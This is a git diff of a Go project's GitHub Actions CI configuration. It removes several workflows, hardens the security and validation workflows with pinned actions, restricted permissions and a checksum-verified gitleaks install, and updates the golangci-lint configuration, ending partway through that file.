index 006e25c33..000000000
--- a/.github/workflows/emoji-check.yml
+++ /dev/null
@@ -1,103 +0,0 @@
-name: Emoji Check
-on:
- pull_request:
- paths:
- - '**.go'
- - '**.md'
- push:
- branches: [main]
- paths:
- - '**.go'
- - '**.md'
-
-jobs:
- check-emojis:
- name: Check for Emojis in Non-Test Files
- runs-on: ubuntu-latest
-
- steps:
- - name: Checkout code
- uses: actions/checkout@v4
- with:
- fetch-depth: 0
-
- - name: Make emoji script executable
- run: chmod +x .github/hooks/remove-emojis.sh
-
- - name: Run emoji check in dry-run mode
- id: emoji-check
- run: |
- # Run the emoji removal script in dry-run mode
- ./.github/hooks/remove-emojis.sh --dry-run > emoji-check.log 2>&1 || true
-
- # Check if any emojis were found
- if grep -q "Files with emojis found: [1-9]" emoji-check.log; then
- echo "emojis_found=true" >> $GITHUB_OUTPUT
- echo "## Emojis Found" >> $GITHUB_STEP_SUMMARY
- echo "" >> $GITHUB_STEP_SUMMARY
- echo "The following files contain emojis that should be removed:" >> $GITHUB_STEP_SUMMARY
- echo "" >> $GITHUB_STEP_SUMMARY
- echo '```' >> $GITHUB_STEP_SUMMARY
- cat emoji-check.log >> $GITHUB_STEP_SUMMARY
- echo '```' >> $GITHUB_STEP_SUMMARY
- else
- echo "emojis_found=false" >> $GITHUB_OUTPUT
- echo "## ✓ No Emojis Found" >> $GITHUB_STEP_SUMMARY
- echo "" >> $GITHUB_STEP_SUMMARY
- echo "All non-test files are emoji-free!" >> $GITHUB_STEP_SUMMARY
- fi
-
- - name: Upload emoji check log
- if: steps.emoji-check.outputs.emojis_found == 'true'
- uses: actions/upload-artifact@v5
- with:
- name: emoji-check-log
- path: emoji-check.log
-
- - name: Comment on PR
- if: github.event_name == 'pull_request' && steps.emoji-check.outputs.emojis_found == 'true'
- uses: actions/github-script@v7
- with:
- script: |
- const fs = require('fs');
- const log = fs.readFileSync('emoji-check.log', 'utf8');
-
- github.rest.issues.createComment({
- issue_number: context.issue.number,
- owner: context.repo.owner,
- repo: context.repo.repo,
- body: `## Emojis Detected
-
- Your PR contains emojis in non-test files. According to Eos project standards (CLAUDE.md), emojis should not be used in production code.
-
- ### How to Fix
-
- Run the emoji removal script locally:
- \`\`\`bash
- ./.github/hooks/remove-emojis.sh
- \`\`\`
-
- Or set up the pre-commit hook to automatically remove emojis:
- \`\`\`bash
- ./.github/hooks/setup-hooks.sh
- \`\`\`
-
- ### Details
-
-
- Click to see emoji check results
-
- \`\`\`
- ${log}
- \`\`\`
-
-
-
- **Note:** Test files are exempt from this check.`
- })
-
- - name: Fail if emojis found
- if: steps.emoji-check.outputs.emojis_found == 'true'
- run: |
- echo "::error::Emojis found in non-test files. Please run ./.github/hooks/remove-emojis.sh to clean them."
- exit 1
diff --git a/.github/workflows/flakiness-detection.yml b/.github/workflows/flakiness-detection.yml
deleted file mode 100644
index 19033b6bf..000000000
--- a/.github/workflows/flakiness-detection.yml
+++ /dev/null
@@ -1,126 +0,0 @@
-# Flakiness Detection Workflow
-# Runs changed tests multiple times to detect flaky/unstable tests
-# Last Updated: 2025-11-05
-
-name: Flakiness Detection
-
-on:
- pull_request:
- paths:
- - '**/*_test.go' # Run when test files change
- - 'pkg/**/*.go' # Run when production code changes (tests might become flaky)
-
-jobs:
- detect-flaky-tests:
- runs-on: ubuntu-latest
- timeout-minutes: 30
-
- steps:
- - name: Checkout code
- uses: actions/checkout@v4
- with:
- fetch-depth: 2 # Need previous commit for diff
-
- - name: Set up Go
- uses: actions/setup-go@v5
- with:
- go-version: '1.24'
- cache: true
-
- - name: Get changed test files
- id: changed-tests
- run: |
- # Find all changed test files (both new and modified)
- git diff --name-only HEAD~1 HEAD | grep '_test.go$' > changed_tests.txt || true
-
- if [ -s changed_tests.txt ]; then
- echo "has_changes=true" >> $GITHUB_OUTPUT
- echo "::notice::Found $(wc -l < changed_tests.txt) changed test files"
- cat changed_tests.txt
- else
- echo "has_changes=false" >> $GITHUB_OUTPUT
- echo "::notice::No test files changed"
- fi
-
- - name: Run changed tests 10 times to detect flakiness
- if: steps.changed-tests.outputs.has_changes == 'true'
- id: flakiness-check
- continue-on-error: true
- run: |
- # Track failures
- FLAKY_TESTS=""
- EXIT_CODE=0
-
- while IFS= read -r test_file; do
- package_path=$(dirname "$test_file")
- echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
- echo "Testing $package_path for flakiness (10 runs with race detector)..."
- echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
-
- # Run test 10 times with race detector
- if ! go test -count=10 -race -v "./$package_path"; then
- echo "::error file=$test_file::Flaky test detected - failed when run multiple times"
- FLAKY_TESTS="$FLAKY_TESTS\n- $test_file"
- EXIT_CODE=1
- else
- echo "::notice file=$test_file::Test is stable (passed all 10 runs)"
- fi
-
- echo ""
- done < changed_tests.txt
-
- if [ $EXIT_CODE -ne 0 ]; then
- echo "flaky_tests<> $GITHUB_OUTPUT
- echo -e "$FLAKY_TESTS" >> $GITHUB_OUTPUT
- echo "EOF" >> $GITHUB_OUTPUT
- fi
-
- exit $EXIT_CODE
-
- - name: Comment on PR if flaky tests found
- if: failure() && steps.flakiness-check.outcome == 'failure'
- uses: actions/github-script@v7
- with:
- script: |
- const flakyTests = process.env.FLAKY_TESTS || 'Unknown tests';
-
- const message = `## ⚠️ Flaky Test Detected!
-
- One or more tests failed when run multiple times with the race detector. This indicates non-deterministic behavior that must be fixed before merging.
-
- ### Flaky Tests
- ${flakyTests}
-
- ### Common Causes
- - **Race conditions**: Use \`-race\` flag to detect data races
- - **Timing dependencies**: Replace \`time.Sleep()\` with polling + timeout
- - **Map iteration order**: Sort maps before comparing
- - **Shared global state**: Ensure proper test isolation
- - **Non-deterministic random values**: Use fixed seeds for testing
-
- ### How to Fix
- 1. Run locally with \`go test -count=10 -race ./path/to/package\`
- 2. Review [Flakiness Prevention Guide](https://github.com/CodeMonkeyCybersecurity/eos/blob/main/INTEGRATION_TESTING.md#flakiness-prevention)
- 3. Consider quarantining with \`//go:build flaky\` tag if immediate fix isn't possible
-
- ### Resources
- - [Go Testing Best Practices](https://go.dev/wiki/TestComments)
- - [Detecting Flakiness](https://circleci.com/blog/reducing-flaky-test-failures/)
- - [Eos Integration Testing Guide](/INTEGRATION_TESTING.md)
-
- **This PR cannot be merged until flakiness is resolved.**`;
-
- await github.rest.issues.createComment({
- issue_number: context.issue.number,
- owner: context.repo.owner,
- repo: context.repo.repo,
- body: message
- });
- env:
- FLAKY_TESTS: ${{ steps.flakiness-check.outputs.flaky_tests }}
-
- - name: Fail workflow if flaky tests detected
- if: failure() && steps.flakiness-check.outcome == 'failure'
- run: |
- echo "::error::Flaky tests detected. See PR comment for details."
- exit 1
diff --git a/.github/workflows/fuzz.yml b/.github/workflows/fuzz.yml
deleted file mode 100644
index f69e91383..000000000
--- a/.github/workflows/fuzz.yml
+++ /dev/null
@@ -1,44 +0,0 @@
-name: Go Fuzz
-
-on:
- push:
- branches: [main]
- pull_request:
- branches: [main]
-
-jobs:
- fuzz:
- runs-on: ubuntu-latest
- steps:
- - uses: actions/checkout@v4
- - uses: actions/setup-go@v5
- with:
- go-version: 1.25 # Match your current Go version
-
- - name: Run Go fuzz tests
- run: |
- echo " Running fuzz tests for each package individually..."
-
- echo " Fuzzing crypto package..."
- go test -run=^FuzzValidateStrongPassword$ -fuzz=^FuzzValidateStrongPassword$ -fuzztime=5s ./pkg/crypto
- go test -run=^FuzzHashString$ -fuzz=^FuzzHashString$ -fuzztime=5s ./pkg/crypto
- go test -run=^FuzzHashStrings$ -fuzz=^FuzzHashStrings$ -fuzztime=5s ./pkg/crypto
- go test -run=^FuzzAllUnique$ -fuzz=^FuzzAllUnique$ -fuzztime=5s ./pkg/crypto
- go test -run=^FuzzAllHashesPresent$ -fuzz=^FuzzAllHashesPresent$ -fuzztime=5s ./pkg/crypto
- go test -run=^FuzzRedact$ -fuzz=^FuzzRedact$ -fuzztime=5s ./pkg/crypto
- go test -run=^FuzzInjectSecretsFromPlaceholders$ -fuzz=^FuzzInjectSecretsFromPlaceholders$ -fuzztime=5s ./pkg/crypto
- go test -run=^FuzzSecureZero$ -fuzz=^FuzzSecureZero$ -fuzztime=5s ./pkg/crypto
-
- echo " Fuzzing interaction package..."
- go test -run=^FuzzNormalizeYesNoInput$ -fuzz=^FuzzNormalizeYesNoInput$ -fuzztime=5s ./pkg/interaction
- go test -run=^FuzzValidateNonEmpty$ -fuzz=^FuzzValidateNonEmpty$ -fuzztime=5s ./pkg/interaction
- go test -run=^FuzzValidateUsername$ -fuzz=^FuzzValidateUsername$ -fuzztime=5s ./pkg/interaction
- go test -run=^FuzzValidateEmail$ -fuzz=^FuzzValidateEmail$ -fuzztime=5s ./pkg/interaction
- go test -run=^FuzzValidateURL$ -fuzz=^FuzzValidateURL$ -fuzztime=5s ./pkg/interaction
- go test -run=^FuzzValidateIP$ -fuzz=^FuzzValidateIP$ -fuzztime=5s ./pkg/interaction
- go test -run=^FuzzValidateNoShellMeta$ -fuzz=^FuzzValidateNoShellMeta$ -fuzztime=5s ./pkg/interaction
-
- echo " Fuzzing parse package..."
- go test -run=^FuzzSplitAndTrim$ -fuzz=^FuzzSplitAndTrim$ -fuzztime=5s ./pkg/parse
-
- echo " All fuzz tests completed successfully!"
\ No newline at end of file
diff --git a/.github/workflows/generator-generic-ossf-slsa3-publish.yml b/.github/workflows/generator-generic-ossf-slsa3-publish.yml
deleted file mode 100644
index 994c29b98..000000000
--- a/.github/workflows/generator-generic-ossf-slsa3-publish.yml
+++ /dev/null
@@ -1,66 +0,0 @@
-# This workflow uses actions that are not certified by GitHub.
-# They are provided by a third-party and are governed by
-# separate terms of service, privacy policy, and support
-# documentation.
-
-# This workflow lets you generate SLSA provenance file for your project.
-# The generation satisfies level 3 for the provenance requirements - see https://slsa.dev/spec/v0.1/requirements
-# The project is an initiative of the OpenSSF (openssf.org) and is developed at
-# https://github.com/slsa-framework/slsa-github-generator.
-# The provenance file can be verified using https://github.com/slsa-framework/slsa-verifier.
-# For more information about SLSA and how it improves the supply-chain, visit slsa.dev.
-
-name: SLSA generic generator
-on:
- workflow_dispatch:
- release:
- types: [created]
-
-jobs:
- build:
- runs-on: ubuntu-latest
- outputs:
- digests: ${{ steps.hash.outputs.digests }}
-
- steps:
- - uses: actions/checkout@v4
-
- # ========================================================
- #
- # Step 1: Build your artifacts.
- #
- # ========================================================
- - name: Build artifacts
- run: |
- # These are some amazing artifacts.
- echo "artifact1" > artifact1
- echo "artifact2" > artifact2
-
- # ========================================================
- #
- # Step 2: Add a step to generate the provenance subjects
- # as shown below. Update the sha256 sum arguments
- # to include all binaries that you generate
- # provenance for.
- #
- # ========================================================
- - name: Generate subject for provenance
- id: hash
- run: |
- set -euo pipefail
-
- # List the artifacts the provenance will refer to.
- files=$(ls artifact*)
- # Generate the subjects (base64 encoded).
- echo "hashes=$(sha256sum $files | base64 -w0)" >> "${GITHUB_OUTPUT}"
-
- provenance:
- needs: [build]
- permissions:
- actions: read # To read the workflow path.
- id-token: write # To sign the provenance.
- contents: write # To add assets to a release.
- uses: slsa-framework/slsa-github-generator/.github/workflows/generator_generic_slsa3.yml@v2.1.0
- with:
- base64-subjects: "${{ needs.build.outputs.digests }}"
- upload-assets: true # Optional: Upload to a new release
diff --git a/.github/workflows/go-ossf-slsa3-publish.yml b/.github/workflows/go-ossf-slsa3-publish.yml
deleted file mode 100644
index 182b3f6be..000000000
--- a/.github/workflows/go-ossf-slsa3-publish.yml
+++ /dev/null
@@ -1,38 +0,0 @@
-# This workflow uses actions that are not certified by GitHub.
-# They are provided by a third-party and are governed by
-# separate terms of service, privacy policy, and support
-# documentation.
-
-# This workflow lets you compile your Go project using a SLSA3 compliant builder.
-# This workflow will generate a so-called "provenance" file describing the steps
-# that were performed to generate the final binary.
-# The project is an initiative of the OpenSSF (openssf.org) and is developed at
-# https://github.com/slsa-framework/slsa-github-generator.
-# The provenance file can be verified using https://github.com/slsa-framework/slsa-verifier.
-# For more information about SLSA and how it improves the supply-chain, visit slsa.dev.
-
-name: SLSA Go releaser
-on:
- workflow_dispatch:
- release:
- types: [created]
-
-permissions: read-all
-
-jobs:
- # ========================================================================================================================================
- # Prerequesite: Create a .slsa-goreleaser.yml in the root directory of your project.
- # See format in https://github.com/slsa-framework/slsa-github-generator/blob/main/internal/builders/go/README.md#configuration-file
- #=========================================================================================================================================
- build:
- permissions:
- id-token: write # To sign.
- contents: write # To upload release assets.
- actions: read # To read workflow path.
- uses: slsa-framework/slsa-github-generator/.github/workflows/builder_go_slsa3.yml@v2.1.0
- with:
- go-version: '1.25'
- # =============================================================================================================
- # Optional: For more options, see https://github.com/slsa-framework/slsa-github-generator#golang-projects
- # =============================================================================================================
-
diff --git a/.github/workflows/label-simple.yml b/.github/workflows/label-simple.yml
index 3ab72a957..f676a6a65 100644
--- a/.github/workflows/label-simple.yml
+++ b/.github/workflows/label-simple.yml
@@ -1,7 +1,7 @@
# Simple labeler workflow that doesn't require label creation permissions
name: Simple Labeler
-on:
+on:
pull_request:
types: [opened, edited, synchronize]
@@ -13,88 +13,72 @@ jobs:
pull-requests: write
steps:
- name: Checkout
- uses: actions/checkout@v4
+ uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
with:
fetch-depth: 0
-
+
- name: Apply labels based on changed files
env:
GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
run: |
- set -e
-
- echo " Analyzing changed files in PR #${{ github.event.number }}"
-
- # Get list of changed files
- git diff --name-only origin/${{ github.base_ref }}...HEAD > changed_files.txt
-
- echo " Changed files:"
+ set -euo pipefail
+
+ echo "Analyzing changed files in PR #${{ github.event.number }}"
+ git fetch origin "${{ github.base_ref }}" --depth=1
+ git diff --name-only "origin/${{ github.base_ref }}"...HEAD > changed_files.txt
+
+ echo "Changed files:"
cat changed_files.txt
echo ""
-
- # Function to add label if it doesn't exist
+
add_label() {
local label="$1"
- echo " Attempting to add label: $label"
-
- # Try to add the label, but don't fail if it doesn't exist
+ echo "Attempting to add label: $label"
gh pr edit ${{ github.event.number }} --add-label "$label" 2>/dev/null && \
- echo " Added label: $label" || \
+ echo "Added label: $label" || \
echo "Could not add label '$label' (may not exist in repository)"
}
-
- # Check for documentation changes
+
if grep -E '\.(md|txt)$|README|SECURITY|LICENSE' changed_files.txt; then
add_label "documentation"
fi
-
- # Check for CLI changes
+
if grep -E '^(main\.go|cmd/|policies/|sql/)' changed_files.txt; then
add_label "cli"
fi
-
- # Check for Ansible changes
+
if grep -E '^ansible/' changed_files.txt; then
add_label "ansible"
fi
-
- # Check for script changes
+
if grep -E '^scripts/|install\.|setupGo\.sh|uninstall\.sh' changed_files.txt; then
add_label "scripts"
fi
-
- # Check for container package changes
+
if grep -E '^pkg/(container|docker)/' changed_files.txt; then
add_label "pkg-container"
fi
-
- # Check for vault package changes
+
if grep -E '^pkg/vault/' changed_files.txt; then
add_label "pkg-vault"
fi
-
- # Check for crypto package changes
+
if grep -E '^pkg/crypto/' changed_files.txt; then
add_label "pkg-crypto"
fi
-
- # Check for CI changes
+
if grep -E '^\.github/' changed_files.txt; then
add_label "ci"
fi
-
- # Check for dependency changes
+
if grep -E '^(go\.(mod|sum)|Dockerfile|docker-compose\.yml)$' changed_files.txt; then
add_label "dependencies"
fi
-
- # Check for any package changes (fallback)
+
if grep -E '^pkg/' changed_files.txt; then
add_label "pkg-other"
fi
-
+
echo ""
- echo " Labeling complete!"
-
- # Clean up
- rm -f changed_files.txt
\ No newline at end of file
+ echo "Labeling complete!"
+ rm -f changed_files.txt
diff --git a/.github/workflows/label.yml b/.github/workflows/label.yml
deleted file mode 100644
index 918cd6edd..000000000
--- a/.github/workflows/label.yml
+++ /dev/null
@@ -1,29 +0,0 @@
-# This workflow will triage pull requests and apply a label based on the
-# paths that are modified in the pull request.
-#
-# This workflow is currently disabled in favor of label-simple.yml
-# which doesn't require label creation permissions.
-
-name: Labeler (Disabled)
-on:
- workflow_dispatch:
- # Disabled - use label-simple.yml instead
- # pull_request:
- # types: [opened, edited, synchronize]
-
-jobs:
- label:
- runs-on: ubuntu-latest
- permissions:
- contents: read
- pull-requests: write
- steps:
- - name: Workflow disabled
- run: |
- echo " This labeler workflow is disabled"
- echo "Using label-simple.yml instead which doesn't require label creation permissions"
- echo ""
- echo "To re-enable this workflow:"
- echo "1. Create repository labels: ./scripts/setup-github-labels.sh"
- echo "2. Uncomment the pull_request trigger above"
- echo "3. Disable label-simple.yml workflow"
\ No newline at end of file
diff --git a/.github/workflows/lint.yml b/.github/workflows/lint.yml
deleted file mode 100644
index faa8c409d..000000000
--- a/.github/workflows/lint.yml
+++ /dev/null
@@ -1,46 +0,0 @@
-name: GolangCI Lint
-
-on:
- push:
- paths:
- - '**.go'
- - '.golangci.yml'
- pull_request:
-
-jobs:
- lint:
- name: Run golangci-lint
- runs-on: ubuntu-latest
-
- steps:
- - name: Checkout code
- uses: actions/checkout@v4
-
- - name: Set up Go
- uses: actions/setup-go@v5
- with:
- go-version: 1.25
-
- - name: Download Go module dependencies
- run: go mod download
-
- - name: Run golangci-lint
- uses: golangci/golangci-lint-action@v9
- with:
- version: latest
- args: --timeout=5m --config=.golangci.yml
-
- - name: Check code formatting
- run: |
- if [ "$(gofmt -s -l . | wc -l)" -gt 0 ]; then
- echo "::warning::The following files are not properly formatted:"
- gofmt -s -l .
- fi
-
- - name: Run go vet
- run: go vet ./...
-
- - name: Check for inefficient assignments
- run: |
- go install github.com/gordonklaus/ineffassign@latest
- ineffassign ./...
\ No newline at end of file
diff --git a/.github/workflows/security.yml b/.github/workflows/security.yml
index 8a92c98b1..3ac70be68 100644
--- a/.github/workflows/security.yml
+++ b/.github/workflows/security.yml
@@ -1,3 +1,6 @@
+# security.yml - Consolidated security scanning
+# Last Updated: 2026-02-22
+
name: Security Validation
on:
@@ -6,95 +9,103 @@ on:
push:
branches: [main]
schedule:
- # Run weekly security scan (Sundays at 2 AM UTC)
- - cron: '0 2 * * 0'
+ - cron: "0 2 * * 0"
+
+concurrency:
+ group: ${{ github.workflow }}-${{ github.ref }}
+ cancel-in-progress: true
jobs:
security-audit:
name: Security Audit
runs-on: ubuntu-latest
-
+ timeout-minutes: 35
+ permissions:
+ contents: read
steps:
- - name: Checkout code
- uses: actions/checkout@v4
+ - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
with:
fetch-depth: 0
- - name: Set up Go
- uses: actions/setup-go@v5
- with:
- go-version: '1.25.3'
- cache: true
+ - name: Setup Go environment
+ uses: ./.github/actions/setup-go-env
+
+ - name: Validate CI policy
+ run: go run ./test/ci/tool policy-validate test/ci/suites.yaml
+
+ - name: CI preflight
+ run: scripts/ci/preflight.sh
- name: Install security tools
run: |
- go install github.com/securego/gosec/v2/cmd/gosec@latest
- go install golang.org/x/vuln/cmd/govulncheck@latest
- echo "✓ Security tools installed"
+ go install github.com/securego/gosec/v2/cmd/gosec@v2.22.4
+ go install golang.org/x/vuln/cmd/govulncheck@v1.1.4
- - name: Run gosec
- run: |
- echo "🔍 Running gosec security scanner..."
- gosec -fmt=sarif -out=gosec-results.sarif -severity=medium -confidence=medium ./...
+ - name: Run gosec (emit JSON for allowlist gate)
continue-on-error: true
+ run: |
+ mkdir -p outputs/ci/security-audit
+ GOSEC_BIN="$(go env GOPATH)/bin/gosec"
+ "${GOSEC_BIN}" -fmt=json -severity=medium -confidence=medium ./... > outputs/ci/security-audit/gosec.json
- name: Run govulncheck
- run: |
- echo "🔍 Scanning for known vulnerabilities..."
- govulncheck ./...
+ run: govulncheck ./...
- - name: Custom Security Checks
+ - name: Run custom security checks
+ env:
+ CI_SECURITY_DIR: outputs/ci/security-audit
+ CI_SECURITY_ALLOWLIST_FILE: test/ci/security-allowlist.yaml
+ run: scripts/ci/security-checks.sh
+
+ - name: Summarize security lane
+ if: always()
+ env:
+ CI_LANE: security-audit
+ CI_STATUS: ${{ job.status }}
+ CI_LOG_DIR: outputs/ci/security-audit
+ CI_COVERAGE_FILE: "-"
+ CI_REPORT_FILE: outputs/ci/security-audit/report.json
+ CI_SUMMARY_FILE: outputs/ci/security-audit/summary.md
+ run: scripts/ci/summary.sh
+
+ - name: Bundle security artifacts
+ if: always()
run: |
- echo "🔍 Running custom security checks..."
- ERRORS=0
-
- echo " ├─ Checking VAULT_SKIP_VERIFY..."
- if grep -r "VAULT_SKIP_VERIFY.*1" --include="*.go" --exclude-dir=vendor . | grep -v "handleTLSValidationFailure\|Eos_ALLOW_INSECURE_VAULT\|# P0-2"; then
- echo " │ ❌ VAULT_SKIP_VERIFY found"
- ERRORS=$((ERRORS + 1))
- else
- echo " │ ✓ PASS"
- fi
-
- echo " ├─ Checking InsecureSkipVerify..."
- if grep -r "InsecureSkipVerify.*true" --include="*.go" --exclude="*_test.go" --exclude-dir=vendor . | grep -v "TestConfig"; then
- echo " │ ❌ InsecureSkipVerify found"
- ERRORS=$((ERRORS + 1))
- else
- echo " │ ✓ PASS"
- fi
-
- echo " ├─ Checking VAULT_TOKEN env var..."
- if grep -r 'fmt\.Sprintf.*VAULT_TOKEN.*%s' --include="*.go" --exclude-dir=vendor . | grep -v "VAULT_TOKEN_FILE\|# P0-1"; then
- echo " │ ❌ VAULT_TOKEN env var found"
- ERRORS=$((ERRORS + 1))
- else
- echo " │ ✓ PASS"
- fi
-
- echo " └─ Custom checks complete"
-
- if [ $ERRORS -gt 0 ]; then
- echo "❌ Security validation FAILED"
- exit 1
- fi
- echo "✓ All checks passed"
-
- - name: Upload SARIF
- uses: github/codeql-action/upload-sarif@v3
+ tar -czf outputs/ci/security-audit-artifacts.tgz -C outputs/ci security-audit || true
+ ls -lh outputs/ci/security-audit-artifacts.tgz || true
+
+ - name: Print security report
if: always()
- with:
- sarif_file: gosec-results.sarif
+ run: |
+ test -f outputs/ci/security-audit/report.json && cat outputs/ci/security-audit/report.json || true
+ test -f outputs/ci/security-audit/gosec.json && head -200 outputs/ci/security-audit/gosec.json || true
secret-scanning:
name: Secret Scanning
runs-on: ubuntu-latest
+ timeout-minutes: 10
+ permissions:
+ contents: read
steps:
- - uses: actions/checkout@v4
+ - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
with:
fetch-depth: 0
- - uses: trufflesecurity/trufflehog@main
- with:
- path: ./
- base: ${{ github.event.repository.default_branch }}
- head: HEAD
+
+ - name: Install gitleaks
+ run: |
+ GITLEAKS_VERSION="8.24.3"
+ GITLEAKS_SHA256="9991e0b2903da4c8f6122b5c3186448b927a5da4deef1fe45271c3793f4ee29c"
+ ARCHIVE="/tmp/gitleaks.tar.gz"
+ curl -sSfL -o "${ARCHIVE}" \
+ "https://github.com/gitleaks/gitleaks/releases/download/v${GITLEAKS_VERSION}/gitleaks_${GITLEAKS_VERSION}_linux_x64.tar.gz"
+ echo "${GITLEAKS_SHA256} ${ARCHIVE}" | sha256sum -c -
+ sudo tar -xzf "${ARCHIVE}" -C /usr/local/bin gitleaks
+ rm -f "${ARCHIVE}"
+
+ - name: Run gitleaks (PR diff only)
+ if: github.event_name == 'pull_request'
+ run: gitleaks detect --source=. --redact --log-opts="origin/${{ github.base_ref }}..HEAD"
+
+ - name: Run gitleaks (full scan on push/schedule)
+ if: github.event_name != 'pull_request'
+ run: gitleaks detect --source=. --redact --no-git
diff --git a/.github/workflows/validate.yml b/.github/workflows/validate.yml
index ee027fbcb..071e2f50c 100644
--- a/.github/workflows/validate.yml
+++ b/.github/workflows/validate.yml
@@ -1,45 +1,86 @@
+# validate.yml - Workflow YAML validation
+# Last Updated: 2026-02-22
+
name: Validate Workflows
+
on:
pull_request:
paths:
- '.github/workflows/**'
+ - '.github/actions/**'
+
+concurrency:
+ group: ${{ github.workflow }}-${{ github.ref }}
+ cancel-in-progress: true
jobs:
validate:
runs-on: ubuntu-latest
-
+ timeout-minutes: 10
+ permissions:
+ contents: read
steps:
- - name: Checkout code
- uses: actions/checkout@v4
+ - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
+
+ - name: Set up Go for actionlint
+ uses: actions/setup-go@0a12ed9d6a96ab950c8f026ed9f722fe0da7ef32
+ with:
+ go-version-file: go.mod
+ cache: true
- name: Validate YAML syntax
run: |
- echo "Validating workflow YAML files..."
- # Install yq for YAML validation
- sudo wget -qO /usr/local/bin/yq https://github.com/mikefarah/yq/releases/latest/download/yq_linux_amd64
- sudo chmod +x /usr/local/bin/yq
-
+ sudo apt-get update -qq && sudo apt-get install -y -qq python3-yaml
for file in .github/workflows/*.yml; do
echo "Checking $file"
- yq eval '.' "$file" > /dev/null || exit 1
+ python3 -c "import yaml; yaml.safe_load(open('$file'))" || exit 1
done
echo "All workflow files are valid YAML"
- name: Check workflow structure
run: |
- echo "Checking basic workflow structure..."
for file in .github/workflows/*.yml; do
if ! grep -q "^name:" "$file"; then
- echo "Error: $file missing 'name' field"
+ echo "::error file=$file::Missing 'name' field"
exit 1
fi
if ! grep -q "^on:" "$file"; then
- echo "Error: $file missing 'on' field"
+ echo "::error file=$file::Missing 'on' field"
exit 1
fi
if ! grep -q "^jobs:" "$file"; then
- echo "Error: $file missing 'jobs' field"
+ echo "::error file=$file::Missing 'jobs' field"
exit 1
fi
done
- echo "All workflow files have required structure"
\ No newline at end of file
+ echo "All workflow files have required structure"
+
+ - name: Run actionlint
+ run: |
+ if command -v go >/dev/null 2>&1; then
+ go run github.com/rhysd/actionlint/cmd/actionlint@v1.7.11 -color
+ else
+ echo "::warning::go runtime is unavailable; skipping actionlint"
+ fi
+
+ - name: Check composite action references
+ run: |
+ rm -f /tmp/validate-action-fail
+ for file in .github/workflows/*.yml; do
+ ACTIONS=$(grep -o 'uses: \.\/\.github\/actions\/[^[:space:]]*' "$file" 2>/dev/null || true)
+ if [ -z "$ACTIONS" ]; then
+ continue
+ fi
+ echo "$ACTIONS" | sed 's|uses: \./\.github/actions/||' | sort -u | while read -r action; do
+ action="${action%/}"
+ if [ -n "$action" ] && [ ! -f ".github/actions/$action/action.yml" ]; then
+ echo "::error file=$file::References nonexistent action: .github/actions/$action"
+ echo "FAIL" > /tmp/validate-action-fail
+ fi
+ done
+ done
+ if [ -f /tmp/validate-action-fail ]; then
+ rm -f /tmp/validate-action-fail
+ exit 1
+ fi
+ echo "All composite action references are valid"
diff --git a/.gitignore b/.gitignore
index ec717bc89..d1fafc9b9 100644
--- a/.gitignore
+++ b/.gitignore
@@ -36,6 +36,7 @@ go.work.sum
*.ini
*.venv
*.json
+!package.json
# python
__pycache__
@@ -58,6 +59,7 @@ apps/mattermost/docker*
# Logs and output
*.log
*.out
+outputs/
# Other
*.deb
diff --git a/.gitmodules b/.gitmodules
new file mode 100644
index 000000000..9d2bb3c34
--- /dev/null
+++ b/.gitmodules
@@ -0,0 +1,3 @@
+[submodule "prompts"]
+ path = prompts
+ url = http://vhost7:8167/cybermonkey/prompts.git
diff --git a/.golangci.yml b/.golangci.yml
index 5a093273f..b273c4edb 100644
--- a/.golangci.yml
+++ b/.golangci.yml
@@ -1,192 +1,157 @@
# .golangci.yml - golangci-lint v2 configuration
-# Last Updated: 2025-11-07
-# Documentation: https://golangci-lint.run/docs/configuration/
+# Last Updated: 2026-02-19
+# Documentation: https://golangci-lint.run/docs/configuration/file/
#
# This configuration enforces Eos code quality standards as defined in CLAUDE.md.
# Used by:
# - Local development (golangci-lint run)
# - Pre-commit hooks (.git/hooks/pre-commit)
-# - CI/CD (.github/workflows/comprehensive-quality.yml, lint.yml)
+# - CI/CD (.github/workflows/lint.yml)
version: "2"
-# Linter Selection
+# Run Configuration
+run:
+ timeout: 10m
+ tests: true
+ build-tags:
+ - integration
+ - unit
+
+# Linter Selection and Settings
linters:
# Use recommended linters as baseline, then enable additional ones
- default: recommended
+ default: standard
enable:
- # Code Quality
- - errcheck # Check for unchecked errors (P0 - critical)
- - gosimple # Suggest code simplifications
- - govet # Standard go vet checks
- - ineffassign # Detect ineffectual assignments
- - staticcheck # Advanced static analysis (comprehensive)
- - unused # Find unused constants, variables, functions
+ # Code Quality (P0 - critical)
+ # NOTE: gosimple merged into staticcheck in golangci-lint v2
+ - errcheck
+ - govet
+ - ineffassign
+ - staticcheck
+ - unused
# Security (P0 - critical for Eos)
- - gosec # Security issues (G101-G602)
+ - gosec
- # Style & Best Practices
- # - gofmt # REMOVED: gofmt is a formatter, not a linter in golangci-lint v2
- # - goimports # REMOVED: goimports is a formatter, not a linter in golangci-lint v2
- - misspell # Find commonly misspelled English words
- - unconvert # Remove unnecessary type conversions
- - unparam # Find unused function parameters
- - goconst # Find repeated strings that could be constants
- - prealloc # Find slice declarations that could be preallocated
+ # Style and Best Practices
+ - misspell
+ - unconvert
+ - unparam
+ - goconst
+ - prealloc
# Bug Prevention
- - exportloopref # Prevent loop variable capture bugs
- - nolintlint # Ensure //nolint directives are used correctly
- - bodyclose # Ensure HTTP response bodies are closed
- - contextcheck # Ensure context.Context is used correctly
+ # NOTE: exportloopref removed - fixed in Go 1.22+ language spec
+ - nolintlint
+ - bodyclose
+ - contextcheck
# Performance
- - nakedret # Find naked returns in functions > 5 lines
- - nilerr # Find code that returns nil even if it checks != nil
-
-# Linter-Specific Settings
-linters-settings:
- # Security scanner configuration
- gosec:
- severity: medium
- confidence: medium
- excludes:
- # G104: Audit errors not checked - covered by errcheck linter
- - G104
- # G304: File path from variable - common in CLI tools, manually audited
- - G304
- # G306: Expect WriteFile permissions to be 0600 or less - we use constants
- - G306
-
- # Error checking configuration
- errcheck:
- check-blank: true # Report assignments to blank identifier
- check-type-assertions: true # Report type assertions without error check
